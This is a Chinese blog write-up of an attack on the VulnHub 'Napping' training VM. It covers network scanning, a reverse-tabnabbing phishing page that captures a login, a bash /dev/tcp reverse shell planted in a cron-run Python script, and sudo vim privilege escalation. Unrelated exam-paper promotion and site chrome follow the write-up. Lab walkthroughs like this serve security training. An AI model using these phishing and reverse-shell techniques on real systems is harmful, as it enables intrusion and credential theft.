Napping靶机渗透测试记录

靶机信息

下载地址:https://www.vulnhub.com/entry/napping-101,752/

网络连接:桥接

kali地址:192.168.1.100

ps:这个靶机最好装到virtualbox上,装在vmware可能会出现扫描不到的情况,靶机和kali都设置为桥接模式进行扫描

信息搜集

扫描网段存活主机信息
由于靶机安装在virtualbox上,扫描的时候也会有显示,靶机为192.168.1.104

nmap -sn 192.168.1.0/24

在这里插入图片描述

对目标做进一步的扫描

nmap -A 192.168.1.104

在这里插入图片描述

先查看80端口,发现是一个登录界面,可以去注册一个账号
在这里插入图片描述

注册完账号并登录后发现可以提交链接
在这里插入图片描述

漏洞利用

提交完链接后点击here即可跳转到链接界面
查了下发现使用a标签和target=_blank可以构成Reverse Tabnabbing钓鱼
在这里插入图片描述

在/var/www/html目录下放两个html文件,一个为站点首页(index.html),一个为钓鱼界面(test.html)

在kali上wget下载的网站首页文件为.php,需要重命名为.html

wget http://192.168.1.104/index.php
mv index.php index.html

vim test.html
<!DOCTYPE html>
<html>
<body>
    <script>
    	if(window.opener) window.opener.parent.location.replace('http://192.168.1.100:666/index.html');
    	if(window.opener  != window)  window.opener.parent.location.replace('http://192.168.1.100:666/index.html');
    </script>
</body>
</html>

在这里插入图片描述

访问kali下的网页,需要开启http服务
并在kali监听端口,监听的端口为钓鱼页面里链接的端口

python3 -m http.server 80
nc -lvp 666

在输入链接处,提交创建的钓鱼页面,过个两三分钟后,返回了数据包
在这里插入图片描述
在这里插入图片描述

权限提升

在返回的信息中发现了账号密码,密码这里需要url解码一下
daniel/C@ughtm3napping123,登录到daniel账号
在这里插入图片描述

查看daniel的id信息发现属于administrators组,查找属该组的文件
发现一个python脚本,这个脚本又打开了一个site_status.txt文件,每两分钟执行一次

find / -group administrators -type f 2>/dev/null

在这里插入图片描述

在tmp目录下写一个反向shell,在kali上监听端口
修改python脚本,加入shell脚本的路径,调用os执行

bash -c 'bash -i >& /dev/tcp/192.168.1.100/666 0>&1'

在这里插入图片描述

等脚本定时执行后,回连到adrian账户
sudo -l看一下,发现可以用root权限免密执行vim
直接vim提权

sudo vim -c ':!/bin/bash'
python3 -c 'import pty;pty.spawn("/bin/sh")'

获取到root权限,在root目录下获取到root.txt
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 内容概要 《计算机试卷1》是一份综合性的计算机基础和应用测试卷,涵盖了计算机硬件、软件、操作系统、网络、多媒体技术等多个领域的知识点。试卷包括单选题和操作应用两大类,单选题部分测试学生对计算机基础知识的掌握,操作应用部分则评估学生对计算机应用软件的实际操作能力。 ### 适用人群 本试卷适用于: - 计算机专业或信息技术相关专业的学生,用于课程学习或考试复习。 - 准备计算机等级考试或职业资格认证的人士,作为实战演练材料。 - 对计算机操作有兴趣的自学者,用于提升个人计算机应用技能。 - 计算机基础教育工作者,作为教学资源或出题参考。 ### 使用场景及目标 1. **学习评估**:作为学校或教育机构对学生计算机基础知识和应用技能的评估工具。 2. **自学测试**:供个人自学者检验自己对计算机知识的掌握程度和操作熟练度。 3. **职业发展**:帮助职场人士通过实际操作练习,提升计算机应用能力,增强工作竞争力。 4. **教学资源**:教师可以用于课堂教学,作为教学内容的补充或学生的课后练习。 5. **竞赛准备**:适合准备计算机相关竞赛的学生,作为强化训练和技能检测的材料。 试卷的目标是通过系统性的题目设计,帮助学生全面复习和巩固计算机基础知识,同时通过实际操作题目,提高学生解决实际问题的能力。通过本试卷的学习与练习,学生将能够更加深入地理解计算机的工作原理,掌握常用软件的使用方法,为未来的学术或职业生涯打下坚实的基础。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值